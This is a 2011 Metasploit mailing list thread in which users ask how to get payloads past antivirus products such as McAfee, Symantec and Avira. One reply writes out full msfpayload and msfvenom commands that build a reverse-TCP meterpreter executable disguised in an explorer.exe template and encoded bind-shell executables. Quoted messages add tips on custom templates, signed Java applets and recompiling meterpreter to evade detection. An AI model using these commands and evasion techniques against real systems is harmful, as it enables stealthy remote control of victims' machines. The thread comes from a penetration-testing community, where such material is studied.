Metasploit mailing list archives
Re: Yet another AV bypassing question
From: Ozan UÇAR <mail () ozanucar com>
Date: Mon, 27 Jun 2011 12:08:20 +0300
Hi Everyone,

I tested msfvenom and msfpayload with msfencode. I generated a reverse meterpreter Windows executable file with the following commands:

# ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.200.49 LPORT=4443 R | ./msfencode -t exe -x /opt/framework-3.7.1/msf3/explorer.exe -o 1.exe
# ./msfvenom -p windows/shell/bind_tcp -e x86/shikata_ga_nai -b '\x00' -i 3 -f exe > 2.exe
# ./msfvenom -p windows/shell/bind_tcp -e x86/shikata_ga_nai -b '\x00' -i 3 -t explorer.exe -f exe > 3.exe

But Avira AntiVir detects it as "TR/Crypte.Epack.Gen2". Do you have any solutions?

Thanks for your support.

2011/6/27 Jason Hawks <jason.hawks0 () gmail com>:
> Hi everyone,
>
> Thank you very much for your answers. I wrote my own template and it did it. At least, I was able to use java_signed_applet + meterpreter and bypass McAfee and Symantec EP. I will try with other AV vendors as soon as I can.
>
> Cheers,
> Jason
>
> 2011/6/24 Jason Hawks <jason.hawks0 () gmail com>:
>> Hello list,
>>
>> As many of you, I'm trying to bypass my AV, but I'm not lucky with the metasploit encoders anymore.
>>
>> My question is simple (but I don't know the answer yet). Could modifying and recompiling the meterpreter source code (with spread dummy instructions and a lot of trial-and-error attempts) help me? Or is the main problem not in the meterpreter DLL but somewhere else?
>>
>> Actually, I tried modifying the source code of meterpreter (using Visual Studio Express), but it didn't change anything. Therefore, I'm wondering if it's just a matter of tries or if I'm wasting my time. Am I looking in the right direction?
>>
>> For information, I'm playing with McAfee 8.X right now.
>>
>> Thank you very much for your lights. Any other tips are welcome.
>>
>> Cheers,
>> Jason
>>
>> _______________________________________________
>> https://mail.metasploit.com/mailman/listinfo/framework
Current thread:
- Yet another AV bypassing question Jason Hawks (Jun 24)
- Re: Yet another AV bypassing question Average SecurityGuy (Jun 24)
- Re: Yet another AV bypassing question scriptjunkie (Jun 24)
- Re: Yet another AV bypassing question Jason Hawks (Jun 26)
- Re: Yet another AV bypassing question Ozan UÇAR (Jun 27)
- Re: Yet another AV bypassing question Average SecurityGuy (Jun 24)